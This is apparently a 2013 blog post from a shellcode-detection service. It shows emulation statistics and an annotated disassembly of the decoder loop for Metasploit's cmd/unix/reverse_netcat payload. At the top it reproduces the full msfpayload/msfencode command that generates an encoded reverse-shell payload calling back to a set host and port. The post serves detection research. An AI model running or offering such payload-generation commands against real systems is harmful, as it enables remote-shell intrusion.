Monday, March 18, 2013

Investigation statistics for metsaploit's cmd/unix/reverse_netcat shellcode

======== Payload investigation statistics ========
Payload generation command: #msfpayload cmd/unix/reverse_netcat LHOST=192.168.111.129 LPORT=9988 O | msfencode -e x86/shikata_ga_nai -c 9 -t raw| msfencode -e x86/countdown -c 7 -t raw Suspicios payload offset: 0 Emulation attribute name Value ======================================================= WRITES_TO_PROCESS_STACK_MEMORY 0 ------------------------------------------------------- BUFFER_INSIDE_WRITES_COUNT 48 ------------------------------------------------------- REFERENCES_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- BUFFER_OUTSIDE_WRITES_COUNT 0 ------------------------------------------------------- FAR_JUMPS_COUNT 0 ------------------------------------------------------- FULLY_INITIALIZED_INSTRUCTIONS 100 ------------------------------------------------------- PROVIDED_ABSOLUTE_MEMORY_ADDRESSES 1 ------------------------------------------------------- PROC_CALLS_INSIDE_INV_BUFFER 1 ------------------------------------------------------- BUFFER_OUTSIDE_READS_COUNT 1 ------------------------------------------------------- UNDEFINED_DIRECT_CALLS 0 ------------------------------------------------------- JUMPS_INSIDE_INV_BUFFER 48 ------------------------------------------------------- CORRECTLY_PARSED_INSTRUCTIONS 100 ------------------------------------------------------- MEMORY_MODIFYING_MATH_INSTRUCTIONS 0 ------------------------------------------------------- BUFFER_INSIDE_READS_COUNT 0 ------------------------------------------------------- SYSTEM_CALLS_COUNT 0 ------------------------------------------------------- UNRECOGNIZED_CALL_TARGETS 0 ------------------------------------------------------- REFERENCES_TO_PROCESS_IMPORTS 0 ------------------------------------------------------- CORRECT_PROCEDURES_CALLS 0 ------------------------------------------------------- EIP_RETRIEVAL_INSTRUCTIONS 0 ------------------------------------------------------- JUMPS_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- EXECUTED_ARITHMETIC_INSTRUCTIONS 1 ------------------------------------------------------- CALLS_TARGETED_IMPORTS_SECTION 0 ------------------------------------------------------- UNRECOGNIZED_JUMP_TARGETS 0 ------------------------------------------------------- CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS 0 ------------------------------------------------------- REFERENCES_TO_PROCESS_EXPORTS 0 ------------------------------------------------------- EXECUTES_BITS_OPERATING_INSTRUCTIONS 0 ------------------------------------------------------- IMMEDIATE_OPERANDS_INSTRUCTIONS 0 ------------------------------------------------------- INDIRECT_BUFFER_REFERENCES 1 ------------------------------------------------------- MAX_WRITTEN_MEMORY_BLOCK 0 ------------------------------------------------------- CORRECTLY_EXECUTED_INSTRUCTIONS 100 ------------------------------------------------------- READS_FROM_PROCESS_STACK_MEMORY 1 ------------------------------------------------------- CALLS_TARGETED_EXPORTS_SECTION 0 ------------------------------------------------------- More about quttera investigation engine here


 ======== Detection disassembly ======== 

MOV ECX (0x00000000),0x00000369                      
CALL 0xBF9D2695                                      
INC ECX (0x00000369)                                 
POP ESI (0x00000000)                                 
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A07),CL (0x6A)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A06),CL (0x69)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A05),CL (0x68)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A04),CL (0x67)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A03),CL (0x66)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A02),CL (0x65)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A01),CL (0x64)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A00),CL (0x63)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FF),CL (0x62)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FE),CL (0x61)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FD),CL (0x60)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FC),CL (0x5F)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FB),CL (0x5E)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FA),CL (0x5D)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F9),CL (0x5C)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F8),CL (0x5B)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F7),CL (0x5A)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F6),CL (0x59)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F5),CL (0x58)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F4),CL (0x57)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F3),CL (0x56)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F2),CL (0x55)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F1),CL (0x54)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F0),CL (0x53)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EF),CL (0x52)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EE),CL (0x51)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29ED),CL (0x50)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EC),CL (0x4F)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EB),CL (0x4E)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EA),CL (0x4D)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E9),CL (0x4C)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E8),CL (0x4B)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E7),CL (0x4A)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E6),CL (0x49)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E5),CL (0x48)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E4),CL (0x47)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E3),CL (0x46)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E2),CL (0x45)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E1),CL (0x44)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E0),CL (0x43)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DF),CL (0x42)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DE),CL (0x41)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DD),CL (0x40)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DC),CL (0x3F)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DB),CL (0x3E)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DA),CL (0x3D)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D9),CL (0x3C)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D8),CL (0x3B)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction